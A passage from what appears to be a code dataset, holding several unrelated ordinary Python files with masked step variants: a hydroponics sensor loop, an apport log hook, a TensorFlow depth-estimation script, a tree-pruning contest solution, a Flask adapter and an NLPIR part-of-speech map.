Alternatively load a TTF font.\n # Some other nice fonts to try: http://www.dafont.com/bitmap.php\n font = ImageFont.truetype('Vdj.ttf', 8)\n # Draw a black filled box to clear the image.\n draw.rectangle((0,0,width,height), outline=0, fill=0)\n\n # Draw some shapes.\n # First define some constants to allow easy resizing of shapes.\n padding = 2\n shape_width = 20\n top = padding\n bottom = height-padding\n\n # Move left to right keeping track of the current x position for drawing shapes.\n x = padding\n\n draw.text((x, top), 'photo: ', font=font, fill=255)\n draw.text((x, top+16), 'tankLevel: ', font=font, fill=255)\n draw.text((x, top+32), 'tankTemp: ', font=font, fill=255)\n draw.text((x, top+48), 'bedTemp: ', font=font, fill=255)\n draw.text((x+64, top), str(readings['photocell'])[:4], font=font, fill=255)\n draw.text((x+64, top+16), str(readings['tankLevel'])[:4], font=font, fill=255)\n draw.text((x+64, top+32), str(readings['tankTemp'])[:4], font=font, fill=255) \n draw.text((x+64, top+48), 
str(readings['bedTemp'])[:4], font=font, fill=255)\n \n # Draw an ellipse.\n # draw.ellipse((x, top , x+shape_width, bottom), outline=255, fill=0)\n # x += shape_width+padding\n # Draw a rectangle.\n # draw.rectangle((x, top, x+shape_width, bottom), outline=255, fill=0)\n # x += shape_width+padding\n # Draw a triangle.\n # draw.polygon([(x, bottom), (x+shape_width/2, top), (x+shape_width, bottom)], outline=255, fill=0)\n # x += shape_width+padding\n # Draw an X.\n # draw.line((x, bottom, x+shape_width, top), fill=255)\n # draw.line((x, top, x+shape_width, bottom), fill=255)\n # x += shape_width+padding\n \n # Display image.\n disp.image(image)\n disp.display()\n # so, what will state display be?\n # I2C display of tank temp?\n\ndef do_pump_toggle():\n print 'pump actuate'\n '''\n this should actually work like:\n if currentMinute mod PUMP_DURATION < PUMP_INTERVAL:\n activate pump\n else:\n turn off pump\n '''\n if (datetime.datetime.today().hour>6 and datetime.datetime.today().hour<23):\n print 'within actuating timeframe'\n # changed this to just pump for the first PUMP_DURATION minutes every hour\n if(datetime.datetime.today().minute <= PUMP_DURATION):\n print 'we are in the first %s minutes of the hour, so pump should be on.' % PUMP_DURATION\n gpio.output(pumpPin,gpio.HIGH)\n else:\n print 'shutting off pump at %s' % datetime.datetime.today().minute\n gpio.output(pumpPin,gpio.LOW)\n else:\n print 'it is the actuator quiet period, between 11pm and 6am'\n gpio.output(pumpPin,gpio.LOW)\n\nprint 'starting sampling at'\nprint datetime.datetime.now(tzlocal())\nlogging.basicConfig(filename='example.log',level=logging.DEBUG)\n# adc.setup(thermistor1)\n# adc.setup(thermistor2)\n# adc.setup(photoPin)\nadc.setup()\n# uart.setup('UART2')\n# print 'uart setup'\ngpio.setup(pumpPin,gpio.OUT)\n# t = tmp102.TMP102()\ndisp = ssd.SSD1306_128_64(rst=RST,i2c_address=0x3D)\ndisp.begin()\ndisp.clear()\ndisp.display()\n# NOTE\n# There is currently a bug in the ADC driver.\n# You'll need to read the values twice\n# in order to get the latest value.\n# pwm.start(greenPin, 10.0, 2000.0)\n# pwm.start(redPin, 10.0, 2000.0)\n# pwm.start(bluePin, 10.0, 2000.0)\natexit.register(exit_handler)\n\nwhile True:\n try:\n do_sensor_read()\n except Exception, e:\n print e\n print 'sensor_read error!'\n try:\n do_db_update()\n except Exception, e:\n print e\n print 'do_db_update error!'\n try:\n do_state_display()\n # pass\n except Exception, e:\n print e\n print 'do_state_display error!'\n try:\n do_pump_toggle()\n except Exception, e:\n print e\n print 'do_pump_toggle error!'\n print 'done with cycle, now waiting %s' % datetime.datetime.today()\n time.sleep(interval)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# apport hook for oem-config; adds log file
import os.path
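
# Apport calls add_info(report) while assembling a bug report; assigning a
# one-element tuple containing a file path asks apport to attach that file's
# contents to the report under the given key.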
def add_info(report):
if os.path.exists('/var/log/oem-config.log'):
report['OemConfigLog'] = ('/var/log/oem-config.log',)
|
normal
|
{
"blob_id": "74b1cdcb1aaf6cde7e8ce3eeb73cd82689719b00",
"index": 6404,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef add_info(report):\n if os.path.exists('/var/log/oem-config.log'):\n report['OemConfigLog'] = '/var/log/oem-config.log',\n",
"step-3": "import os.path\n\n\ndef add_info(report):\n if os.path.exists('/var/log/oem-config.log'):\n report['OemConfigLog'] = '/var/log/oem-config.log',\n",
"step-4": "# apport hook for oem-config; adds log file\n\nimport os.path\n\ndef add_info(report):\n if os.path.exists('/var/log/oem-config.log'):\n report['OemConfigLog'] = ('/var/log/oem-config.log',)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
'''
"MAIN" module
All operations are added to the defaultgraph.
Network functions are found in module network_functions_2
Display the graph in TensorBoard by opening a new terminal and running "tensorboard --logdir=tensorboard/debug/01/", where
the last number depends on which directory the current graph is saved in (see line 35 in this module, where the
FileWriter is created). After this, open the local web page shown in the terminal (it looks something like
http://OSCAR-LENOVO-LAPTOP:6006, but with your own hostname).
'''
import network_functions_2_elin as nf
import tensorflow as tf
import numpy as np
import read_data as rd
with tf.name_scope("input_data"):
# import images
(iterate_data, sub_images, sub_depths, sub_images_placeholder, sub_depths_placeholder) = rd.read_debug_data()
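	# NOTE: the three constants below are redefined a few lines further down;
	# only the later definitions are actually fed to the networks.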
sub_images_coarse = tf.constant(value = np.moveaxis(sub_images[0:223, 0:303, :, :], -1, 0), dtype = tf.float32, name = "images_coarse")
sub_images_fine = tf.constant(value = np.moveaxis(sub_images[0:227, 0:303, :, :], -1, 0), dtype = tf.float32, name = "images_fine")
depthmaps_groundtruth = tf.constant(value = np.moveaxis(sub_depths[0:55, 0:74, :], -1, 0), dtype = tf.float32, name = "depthmaps_groundtruth")
sub_images_coarse = tf.constant(value = sub_images[:,0:223, 0:303, :], dtype = tf.float32, name = "images_coarse")
sub_images_fine = tf.constant(value = sub_images[:, 0:227, 0:303, :], dtype = tf.float32, name = "images_fine")
depthmaps_groundtruth = tf.constant(value = np.moveaxis(sub_depths[:,0:55, 0:74, :], -1, 0), dtype = tf.float32, name = "depthmaps_groundtruth")
# print sample images to tensorboard
tf.summary.image(name = "images_coarse", tensor = sub_images_coarse, max_outputs = 1)
tf.summary.image(name = "images_fine", tensor = sub_images_fine, max_outputs = 1)
# define coarse and fine networks
coarse_depthmap_predictions = nf.get_coarse_network(input_placeholder = sub_images_coarse)
fine_depthmap_predictions = nf.get_fine_network(input_placeholder = sub_images_fine, coarse_prediction = coarse_depthmap_predictions)
# Session: tensorflow calculates all values using the input
with tf.Session() as sess:
# tensorboard writer CHANGE THE DIR NUMBER EVERY RUN (27 -> 28 -> 29 etc.)
# tensorboard/* in .gitignore
writer = tf.summary.FileWriter("./tensorboard/debug/07", sess.graph)
sess.run(tf.global_variables_initializer())
sess.run(fine_depthmap_predictions)
# compute cost function
fine_cost = nf.get_cost_function(depthmaps_predicted = fine_depthmap_predictions,
depthmaps_groundtruth = depthmaps_groundtruth)
# calculate and run optimizer
optimizer_fine = nf.get_fine_optimizer(fine_cost)
sess.run(tf.global_variables_initializer())
sess.run(optimizer_fine)
# this code makes sure that all info gets written to tensorboard
merged_summary = sess.run(tf.summary.merge_all())
writer.add_summary(merged_summary)
writer.close()
|
normal
|
{
"blob_id": "8a2cf1d550a593beae579104413b424e007d511f",
"index": 9048,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith tf.name_scope('input_data'):\n (iterate_data, sub_images, sub_depths, sub_images_placeholder,\n sub_depths_placeholder) = rd.read_debug_data()\n sub_images_coarse = tf.constant(value=np.moveaxis(sub_images[0:223, 0:\n 303, :, :], -1, 0), dtype=tf.float32, name='images_coarse')\n sub_images_fine = tf.constant(value=np.moveaxis(sub_images[0:227, 0:303,\n :, :], -1, 0), dtype=tf.float32, name='images_fine')\n depthmaps_groundtruth = tf.constant(value=np.moveaxis(sub_depths[0:55, \n 0:74, :], -1, 0), dtype=tf.float32, name='depthmaps_groundtruth')\n sub_images_coarse = tf.constant(value=sub_images[:, 0:223, 0:303, :],\n dtype=tf.float32, name='images_coarse')\n sub_images_fine = tf.constant(value=sub_images[:, 0:227, 0:303, :],\n dtype=tf.float32, name='images_fine')\n depthmaps_groundtruth = tf.constant(value=np.moveaxis(sub_depths[:, 0:\n 55, 0:74, :], -1, 0), dtype=tf.float32, name='depthmaps_groundtruth')\n tf.summary.image(name='images_coarse', tensor=sub_images_coarse,\n max_outputs=1)\n tf.summary.image(name='images_fine', tensor=sub_images_fine, max_outputs=1)\n<mask token>\nwith tf.Session() as sess:\n writer = tf.summary.FileWriter('./tensorboard/debug/07', sess.graph)\n sess.run(tf.global_variables_initializer())\n sess.run(fine_depthmap_predictions)\n fine_cost = nf.get_cost_function(depthmaps_predicted=\n fine_depthmap_predictions, depthmaps_groundtruth=depthmaps_groundtruth)\n optimizer_fine = nf.get_fine_optimizer(fine_cost)\n sess.run(tf.global_variables_initializer())\n sess.run(optimizer_fine)\n merged_summary = sess.run(tf.summary.merge_all())\n writer.add_summary(merged_summary)\n writer.close()\n",
"step-3": "<mask token>\nwith tf.name_scope('input_data'):\n (iterate_data, sub_images, sub_depths, sub_images_placeholder,\n sub_depths_placeholder) = rd.read_debug_data()\n sub_images_coarse = tf.constant(value=np.moveaxis(sub_images[0:223, 0:\n 303, :, :], -1, 0), dtype=tf.float32, name='images_coarse')\n sub_images_fine = tf.constant(value=np.moveaxis(sub_images[0:227, 0:303,\n :, :], -1, 0), dtype=tf.float32, name='images_fine')\n depthmaps_groundtruth = tf.constant(value=np.moveaxis(sub_depths[0:55, \n 0:74, :], -1, 0), dtype=tf.float32, name='depthmaps_groundtruth')\n sub_images_coarse = tf.constant(value=sub_images[:, 0:223, 0:303, :],\n dtype=tf.float32, name='images_coarse')\n sub_images_fine = tf.constant(value=sub_images[:, 0:227, 0:303, :],\n dtype=tf.float32, name='images_fine')\n depthmaps_groundtruth = tf.constant(value=np.moveaxis(sub_depths[:, 0:\n 55, 0:74, :], -1, 0), dtype=tf.float32, name='depthmaps_groundtruth')\n tf.summary.image(name='images_coarse', tensor=sub_images_coarse,\n max_outputs=1)\n tf.summary.image(name='images_fine', tensor=sub_images_fine, max_outputs=1)\ncoarse_depthmap_predictions = nf.get_coarse_network(input_placeholder=\n sub_images_coarse)\nfine_depthmap_predictions = nf.get_fine_network(input_placeholder=\n sub_images_fine, coarse_prediction=coarse_depthmap_predictions)\nwith tf.Session() as sess:\n writer = tf.summary.FileWriter('./tensorboard/debug/07', sess.graph)\n sess.run(tf.global_variables_initializer())\n sess.run(fine_depthmap_predictions)\n fine_cost = nf.get_cost_function(depthmaps_predicted=\n fine_depthmap_predictions, depthmaps_groundtruth=depthmaps_groundtruth)\n optimizer_fine = nf.get_fine_optimizer(fine_cost)\n sess.run(tf.global_variables_initializer())\n sess.run(optimizer_fine)\n merged_summary = sess.run(tf.summary.merge_all())\n writer.add_summary(merged_summary)\n writer.close()\n",
"step-4": "<mask token>\nimport network_functions_2_elin as nf\nimport tensorflow as tf\nimport numpy as np\nimport read_data as rd\nwith tf.name_scope('input_data'):\n (iterate_data, sub_images, sub_depths, sub_images_placeholder,\n sub_depths_placeholder) = rd.read_debug_data()\n sub_images_coarse = tf.constant(value=np.moveaxis(sub_images[0:223, 0:\n 303, :, :], -1, 0), dtype=tf.float32, name='images_coarse')\n sub_images_fine = tf.constant(value=np.moveaxis(sub_images[0:227, 0:303,\n :, :], -1, 0), dtype=tf.float32, name='images_fine')\n depthmaps_groundtruth = tf.constant(value=np.moveaxis(sub_depths[0:55, \n 0:74, :], -1, 0), dtype=tf.float32, name='depthmaps_groundtruth')\n sub_images_coarse = tf.constant(value=sub_images[:, 0:223, 0:303, :],\n dtype=tf.float32, name='images_coarse')\n sub_images_fine = tf.constant(value=sub_images[:, 0:227, 0:303, :],\n dtype=tf.float32, name='images_fine')\n depthmaps_groundtruth = tf.constant(value=np.moveaxis(sub_depths[:, 0:\n 55, 0:74, :], -1, 0), dtype=tf.float32, name='depthmaps_groundtruth')\n tf.summary.image(name='images_coarse', tensor=sub_images_coarse,\n max_outputs=1)\n tf.summary.image(name='images_fine', tensor=sub_images_fine, max_outputs=1)\ncoarse_depthmap_predictions = nf.get_coarse_network(input_placeholder=\n sub_images_coarse)\nfine_depthmap_predictions = nf.get_fine_network(input_placeholder=\n sub_images_fine, coarse_prediction=coarse_depthmap_predictions)\nwith tf.Session() as sess:\n writer = tf.summary.FileWriter('./tensorboard/debug/07', sess.graph)\n sess.run(tf.global_variables_initializer())\n sess.run(fine_depthmap_predictions)\n fine_cost = nf.get_cost_function(depthmaps_predicted=\n fine_depthmap_predictions, depthmaps_groundtruth=depthmaps_groundtruth)\n optimizer_fine = nf.get_fine_optimizer(fine_cost)\n sess.run(tf.global_variables_initializer())\n sess.run(optimizer_fine)\n merged_summary = sess.run(tf.summary.merge_all())\n writer.add_summary(merged_summary)\n writer.close()\n",
"step-5": "'''\n\"MAIN\" module \nAll operations are added to the defaultgraph.\nNetwork functions are found in module network_functions_2 \nDisplay graph in tensorboard by opening a new terminal and write \"tensorboard --logdir=tensorbaord/debug/01/\" where \nthe last number depends on which directory the current graph is saved in (see line 35 in this module where the \nFileWriter is created). After this, open the local webpage displayed in the terminal (looks something like http://OSCAR-LENOVO-LAPTOP:6006) \nbut with your own username. \n'''\n\nimport network_functions_2_elin as nf\nimport tensorflow as tf\nimport numpy as np\nimport read_data as rd\n\n\nwith tf.name_scope(\"input_data\"):\n\t# import images \n\t(iterate_data, sub_images, sub_depths, sub_images_placeholder, sub_depths_placeholder) = rd.read_debug_data()\t\n\tsub_images_coarse = tf.constant(value = np.moveaxis(sub_images[0:223, 0:303, :, :], -1, 0), dtype = tf.float32, name = \"images_coarse\") \n\tsub_images_fine = tf.constant(value = np.moveaxis(sub_images[0:227, 0:303, :, :], -1, 0), dtype = tf.float32, name = \"images_fine\") \n\tdepthmaps_groundtruth = tf.constant(value = np.moveaxis(sub_depths[0:55, 0:74, :], -1, 0), dtype = tf.float32, name = \"depthmaps_groundtruth\")\n\n\tsub_images_coarse = tf.constant(value = sub_images[:,0:223, 0:303, :], dtype = tf.float32, name = \"images_coarse\") \n\tsub_images_fine = tf.constant(value = sub_images[:, 0:227, 0:303, :], dtype = tf.float32, name = \"images_fine\") \n\tdepthmaps_groundtruth = tf.constant(value = np.moveaxis(sub_depths[:,0:55, 0:74, :], -1, 0), dtype = tf.float32, name = \"depthmaps_groundtruth\")\n\t\n\t# print sample images to tensorboard \n\ttf.summary.image(name = \"images_coarse\", tensor = sub_images_coarse, max_outputs = 1)\n\ttf.summary.image(name = \"images_fine\", tensor = sub_images_fine, max_outputs = 1)\n\n\n# define coarse and fine networks \ncoarse_depthmap_predictions = nf.get_coarse_network(input_placeholder = sub_images_coarse)\nfine_depthmap_predictions = nf.get_fine_network(input_placeholder = sub_images_fine, coarse_prediction = coarse_depthmap_predictions)\n\n\n# Session: tensorflow calculates all values using the input \nwith tf.Session() as sess:\n\n\t# tensorboard writer CHANGE THE DIR NUMBER EVERY RUN (27 -> 28 -> 29 etc.)\n\t# tensorboard/* in .gitignore \n\twriter = tf.summary.FileWriter(\"./tensorboard/debug/07\", sess.graph) \t\n\n\tsess.run(tf.global_variables_initializer())\t\n\t\t\t\t\t\t\t \n\tsess.run(fine_depthmap_predictions)\t\t\t\t\t\t\t\t\t\t\n\n\t# compute cost function \n\tfine_cost = nf.get_cost_function(depthmaps_predicted = fine_depthmap_predictions, \n\t\t\t\t\t\t\t\t\tdepthmaps_groundtruth = depthmaps_groundtruth)\n\n\t# calculate and run optimizer \n\toptimizer_fine = nf.get_fine_optimizer(fine_cost)\t\n\tsess.run(tf.global_variables_initializer())\t\t\t\n\tsess.run(optimizer_fine)\n\n\t# this code makes sure that all info gets written to tensorboard \n\tmerged_summary = sess.run(tf.summary.merge_all())\n\twriter.add_summary(merged_summary)\n\twriter.close()\n\n\n\t\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import sys
from collections import defaultdict
sys.setrecursionlimit(1200)
def dfs(G, v, prev):
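    """
    Return (deletions, size) for the subtree rooted at v, reached from prev:
    `size` is the number of nodes in the subtree, and `deletions` is the
    minimum number of nodes that must be removed so the subtree becomes a
    full binary tree rooted at v (every kept node has exactly 0 or 2 children).
    """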
t = []
s = 0
for x in G[v]:
if x == prev: continue
tmp = dfs(G, x, v)
s += tmp[1]
t.append(tmp[0] - tmp[1])
t.sort()
t = t[:2]
if len(t) < 2:
return (s, s+1)
return (s + t[0] + t[1], s+1)
def solve():
read_ints = lambda: map(int, sys.stdin.readline().split())
n = int(sys.stdin.readline())
G = defaultdict(list)
for _ in xrange(n-1):
x, y = read_ints()
x, y = x-1, y-1
G[x].append(y)
G[y].append(x)
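    # Any node may serve as the root; try each one and keep the cheapest pruning.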
return min(dfs(G, i, -1)[0] for i in xrange(n))
for t in xrange(int(sys.stdin.readline())):
print "Case #%d:" % (t + 1),
print solve()
|
normal
|
{
"blob_id": "efa06d929e76a255afd9923b5340252c291a325c",
"index": 3615,
"step-1": "import sys\nfrom collections import defaultdict\nsys.setrecursionlimit(1200)\n\ndef dfs(G, v, prev):\n t = []\n s = 0\n for x in G[v]:\n if x == prev: continue\n tmp = dfs(G, x, v)\n s += tmp[1]\n t.append(tmp[0] - tmp[1])\n t.sort()\n t = t[:2]\n if len(t) < 2:\n return (s, s+1)\n return (s + t[0] + t[1], s+1)\n\ndef solve():\n read_ints = lambda: map(int, sys.stdin.readline().split())\n n = int(sys.stdin.readline())\n G = defaultdict(list)\n for _ in xrange(n-1):\n x, y = read_ints()\n x, y = x-1, y-1\n G[x].append(y)\n G[y].append(x)\n return min(dfs(G, i, -1)[0] for i in xrange(n))\n\nfor t in xrange(int(sys.stdin.readline())):\n print \"Case #%d:\" % (t + 1),\n print solve()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from typing import Type
from sqlalchemy.exc import IntegrityError
from src.main.interface import RouteInterface as Route
from src.presenters.helpers import HttpRequest, HttpResponse
from src.presenters.errors import HttpErrors
def flask_adapter(request: any, api_route: Type[Route]) -> any:
"""Adapter pattern for Flask
    :param request: incoming Flask request.
    :param api_route: composite route implementing the Route interface.
"""
try:
query_string_params = request.args.to_dict()
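        # Requests that identify an account through the query string carry no
        # body; all other requests are expected to provide a JSON body.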
if "account_id" in query_string_params.keys():
body = None
query_string_params["account_id"] = int(query_string_params["account_id"])
else:
body = request.json
    except Exception:  # malformed query string or JSON body
http_error = HttpErrors.error_400()
return HttpResponse(
status_code=http_error["status_code"], body=http_error["body"]
)
http_request = HttpRequest(
header=request.headers, body=body, query=query_string_params
)
try:
response = api_route.route(http_request)
except IntegrityError:
http_error = HttpErrors.error_400()
return HttpResponse(
status_code=http_error["status_code"], body=http_error["body"]
)
except Exception as exc:
print(exc)
http_error = HttpErrors.error_500()
return HttpResponse(
status_code=http_error["status_code"], body=http_error["body"]
)
return response
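

# Illustrative usage sketch (the names `app`, `jsonify`, and
# `RegisterAccountRoute` are assumptions for the example, not part of this module):
#
#   @app.route('/api/accounts', methods=['POST'])
#   def register_account():
#       http_response = flask_adapter(request=request, api_route=RegisterAccountRoute())
#       return jsonify(http_response.body), http_response.status_code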
|
normal
|
{
"blob_id": "3212bb7df990ad7d075b8ca49a99e1072eab2a90",
"index": 595,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef flask_adapter(request: any, api_route: Type[Route]) ->any:\n \"\"\"Adapter pattern for Flask\n :param - Flask Request\n :api_route: Composite Routes\n \"\"\"\n try:\n query_string_params = request.args.to_dict()\n if 'account_id' in query_string_params.keys():\n body = None\n query_string_params['account_id'] = int(query_string_params[\n 'account_id'])\n else:\n body = request.json\n except:\n http_error = HttpErrors.error_400()\n return HttpResponse(status_code=http_error['status_code'], body=\n http_error['body'])\n http_request = HttpRequest(header=request.headers, body=body, query=\n query_string_params)\n try:\n response = api_route.route(http_request)\n except IntegrityError:\n http_error = HttpErrors.error_400()\n return HttpResponse(status_code=http_error['status_code'], body=\n http_error['body'])\n except Exception as exc:\n print(exc)\n http_error = HttpErrors.error_500()\n return HttpResponse(status_code=http_error['status_code'], body=\n http_error['body'])\n return response\n",
"step-3": "from typing import Type\nfrom sqlalchemy.exc import IntegrityError\nfrom src.main.interface import RouteInterface as Route\nfrom src.presenters.helpers import HttpRequest, HttpResponse\nfrom src.presenters.errors import HttpErrors\n\n\ndef flask_adapter(request: any, api_route: Type[Route]) ->any:\n \"\"\"Adapter pattern for Flask\n :param - Flask Request\n :api_route: Composite Routes\n \"\"\"\n try:\n query_string_params = request.args.to_dict()\n if 'account_id' in query_string_params.keys():\n body = None\n query_string_params['account_id'] = int(query_string_params[\n 'account_id'])\n else:\n body = request.json\n except:\n http_error = HttpErrors.error_400()\n return HttpResponse(status_code=http_error['status_code'], body=\n http_error['body'])\n http_request = HttpRequest(header=request.headers, body=body, query=\n query_string_params)\n try:\n response = api_route.route(http_request)\n except IntegrityError:\n http_error = HttpErrors.error_400()\n return HttpResponse(status_code=http_error['status_code'], body=\n http_error['body'])\n except Exception as exc:\n print(exc)\n http_error = HttpErrors.error_500()\n return HttpResponse(status_code=http_error['status_code'], body=\n http_error['body'])\n return response\n",
"step-4": "from typing import Type\nfrom sqlalchemy.exc import IntegrityError\nfrom src.main.interface import RouteInterface as Route\nfrom src.presenters.helpers import HttpRequest, HttpResponse\nfrom src.presenters.errors import HttpErrors\n\n\ndef flask_adapter(request: any, api_route: Type[Route]) -> any:\n \"\"\"Adapter pattern for Flask\n :param - Flask Request\n :api_route: Composite Routes\n \"\"\"\n\n try:\n query_string_params = request.args.to_dict()\n\n if \"account_id\" in query_string_params.keys():\n body = None\n query_string_params[\"account_id\"] = int(query_string_params[\"account_id\"])\n else:\n body = request.json\n\n except:\n http_error = HttpErrors.error_400()\n return HttpResponse(\n status_code=http_error[\"status_code\"], body=http_error[\"body\"]\n )\n\n http_request = HttpRequest(\n header=request.headers, body=body, query=query_string_params\n )\n\n try:\n response = api_route.route(http_request)\n except IntegrityError:\n http_error = HttpErrors.error_400()\n return HttpResponse(\n status_code=http_error[\"status_code\"], body=http_error[\"body\"]\n )\n except Exception as exc:\n print(exc)\n http_error = HttpErrors.error_500()\n return HttpResponse(\n status_code=http_error[\"status_code\"], body=http_error[\"body\"]\n )\n\n return response\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# -*- coding: utf-8 -*-
"""Part of speech mapping constants and functions for NLPIR/ICTCLAS.
This module is used by :mod:`pynlpir` to format segmented words for output.
"""
import logging
logger = logging.getLogger("pynlpir.pos_map")
#: A dictionary that maps part of speech codes returned by NLPIR to
#: human-readable names (English and Chinese).
POS_MAP = {
"n": (
"名词",
"noun",
{
"nr": (
"人名",
"personal name",
{
"nr1": ("汉语姓氏", "Chinese surname"),
"nr2": ("汉语名字", "Chinese given name"),
"nrj": ("日语人名", "Japanese personal name"),
"nrf": ("音译人名", "transcribed personal name"),
},
),
"ns": (
"地名",
"toponym",
{
"nsf": ("音译地名", "transcribed toponym"),
},
),
"nt": ("机构团体名", "organization/group name"),
"nz": ("其它专名", "other proper noun"),
"nl": ("名词性惯用语", "noun phrase"),
"ng": ("名词性语素", "noun morpheme"),
},
),
"t": (
"时间词",
"time word",
{
"tg": ("时间词性语素", "time morpheme"),
},
),
"s": ("处所词", "locative word"),
"f": ("方位词", "noun of locality"),
"v": (
"动词",
"verb",
{
"vd": ("副动词", "auxiliary verb"),
"vn": ("名动词", "noun-verb"),
"vshi": ('动词"是"', "verb 是"),
"vyou": ('动词"有"', "verb 有"),
"vf": ("趋向动词", "directional verb"),
"vx": ("行事动词", "performative verb"),
"vi": ("不及物动词", "intransitive verb"),
"vl": ("动词性惯用语", "verb phrase"),
"vg": ("动词性语素", "verb morpheme"),
},
),
"a": (
"形容词",
"adjective",
{
"ad": ("副形词", "auxiliary adjective"),
"an": ("名形词", "noun-adjective"),
"ag": ("形容词性语素", "adjective morpheme"),
"al": ("形容词性惯用语", "adjective phrase"),
},
),
"b": (
"区别词",
"distinguishing word",
{
"bl": ("区别词性惯用语", "distinguishing phrase"),
},
),
"z": ("状态词", "status word"),
"r": (
"代词",
"pronoun",
{
"rr": ("人称代词", "personal pronoun"),
"rz": (
"指示代词",
"demonstrative pronoun",
{
"rzt": ("时间指示代词", "temporal demonstrative pronoun"),
"rzs": ("处所指示代词", "locative demonstrative pronoun"),
"rzv": ("谓词性指示代词", "predicate demonstrative pronoun"),
},
),
"ry": (
"疑问代词",
"interrogative pronoun",
{
"ryt": ("时间疑问代词", "temporal interrogative pronoun"),
"rys": ("处所疑问代词", "locative interrogative pronoun"),
"ryv": ("谓词性疑问代词", "predicate interrogative pronoun"),
},
),
"rg": ("代词性语素", "pronoun morpheme"),
},
),
"m": (
"数词",
"numeral",
{
"mq": ("数量词", "numeral-plus-classifier compound"),
"mg": ("干支", "zodiac"),
},
),
"q": (
"量词",
"classifier",
{
"qv": ("动量词", "verbal classifier"),
"qt": ("时量词", "temporal classifier"),
},
),
"d": ("副词", "adverb"),
"p": (
"介词",
"preposition",
{
"pba": ("介词“把”", "preposition 把"),
"pbei": ("介词“被”", "preposition 被"),
},
),
"c": (
"连词",
"conjunction",
{
"cc": ("并列连词", "coordinating conjunction"),
},
),
"u": (
"助词",
"particle",
{
"uzhe": ("着", "particle 着"),
"ule": ("了/喽", "particle 了/喽"),
"uguo": ("过", "particle 过"),
"ude1": ("的/底", "particle 的/底"),
"ude2": ("地", "particle 地"),
"ude3": ("得", "particle 得"),
"usuo": ("所", "particle 所"),
"udeng": ("等/等等/云云", "particle 等/等等/云云"),
"uyy": ("一样/一般/似的/般", "particle 一样/一般/似的/般"),
"udh": ("的话", "particle 的话"),
"uls": ("来讲/来说/而言/说来", "particle 来讲/来说/而言/说来"),
"uzhi": ("之", "particle 之"),
"ulian": ("连", "particle 连"),
},
),
"e": ("叹词", "interjection"),
"y": ("语气词", "modal particle"),
"o": ("拟声词", "onomatopoeia"),
"h": ("前缀", "prefix"),
"k": ("后缀", "suffix"),
"x": (
"字符串",
"string",
{
"xe": ("Email字符串", "email address"),
"xs": ("微博会话分隔符", "hashtag"),
"xm": ("表情符合", "emoticon"),
"xu": ("网址URL", "URL"),
"xx": ("非语素字", "non-morpheme character"),
},
),
"w": (
"标点符号",
"punctuation mark",
{
"wkz": ("左括号", "left parenthesis/bracket"),
"wky": ("右括号", "right parenthesis/bracket"),
"wyz": ("左引号", "left quotation mark"),
"wyy": ("右引号", "right quotation mark"),
"wj": ("句号", "period"),
"ww": ("问号", "question mark"),
"wt": ("叹号", "exclamation mark"),
"wd": ("逗号", "comma"),
"wf": ("分号", "semicolon"),
"wn": ("顿号", "enumeration comma"),
"wm": ("冒号", "colon"),
"ws": ("省略号", "ellipsis"),
"wp": ("破折号", "dash"),
"wb": ("百分号千分号", "percent/per mille sign"),
"wh": ("单位符号", "unit of measure sign"),
},
),
"g": ("复合语", "multiword expression"),
"j": ("略语", "abbreviation"),
}
def _get_pos_name(pos_code, names="parent", english=True, pos_map=POS_MAP):
"""Gets the part of speech name for *pos_code*."""
if names not in ("parent", "child", "all", "raw"):
raise ValueError(
"names must be one of 'parent', 'child', 'all', or "
"'raw'; not '{0}'".format(names)
)
logger.debug(
"Getting {0} POS name for '{1}' formatted as '{2}'.".format(
"English" if english else "Chinese", pos_code, names
)
)
if names == "raw":
return pos_code
pos_code = pos_code.lower() # Issue #10
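    # Find the shortest prefix of the code that exists at this level of the
    # map (e.g. 'n' for 'nr1'); more specific names are resolved further down
    # by descending into that entry's sub-map.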
for i in range(1, len(pos_code) + 1):
try:
pos_key = pos_code[0:i]
pos_entry = pos_map[pos_key]
break
except KeyError:
if i == len(pos_code):
logger.warning("part of speech not recognized: '{0}'".format(pos_code))
return None # Issue #20
pos = (pos_entry[1 if english else 0],)
if names == "parent":
logger.debug("Part of speech name found: '{0}'".format(pos[0]))
return pos[0]
if len(pos_entry) == 3 and pos_key != pos_code:
sub_map = pos_entry[2]
logger.debug(
"Found parent part of speech name '{0}'. Descending to "
"look for child name for '{1}'".format(pos_entry[1], pos_code)
)
sub_pos = _get_pos_name(pos_code, names, english, sub_map)
if names == "all":
# sub_pos can be None sometimes (e.g. for a word '甲')
pos = pos + sub_pos if sub_pos else pos
else:
pos = (sub_pos,)
name = pos if names == "all" else pos[-1]
logger.debug("Part of speech name found: '{0}'".format(name))
return name
def get_pos_name(code, name="parent", english=True, pos_tags=POS_MAP):
"""Gets the part of speech name for *code*.
:param str code: The part of speech code to lookup, e.g. ``'nsf'``.
:param str name: Which part of speech name to include in the output. Must
be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.
Defaults to ``'parent'``. ``'parent'`` indicates that only the most
generic name should be used, e.g. ``'noun'`` for ``'nsf'``.
``'child'`` indicates that the most specific name should be used, e.g.
``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all
names should be used, e.g. ``('noun', 'toponym',
'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the
part of speech code is not transformed at all.
:param bool english: Whether to return an English or Chinese name.
:param dict pos_tags: Custom part of speech tags to use.
:returns: ``str`` if *name* is ``'parent'`` or ``'child'``.
``tuple`` if *name* is ``'all'``.
"""
return _get_pos_name(code, name, english, pos_tags)
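

# Examples taken from the docstring above: get_pos_name('nsf') returns 'noun',
# get_pos_name('nsf', 'child') returns 'transcribed toponym', and
# get_pos_name('nsf', 'all') returns ('noun', 'toponym', 'transcribed toponym').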
|
normal
|
{
"blob_id": "093b2afef7cdfb7070eb5e94e84624afe495db66",
"index": 1948,
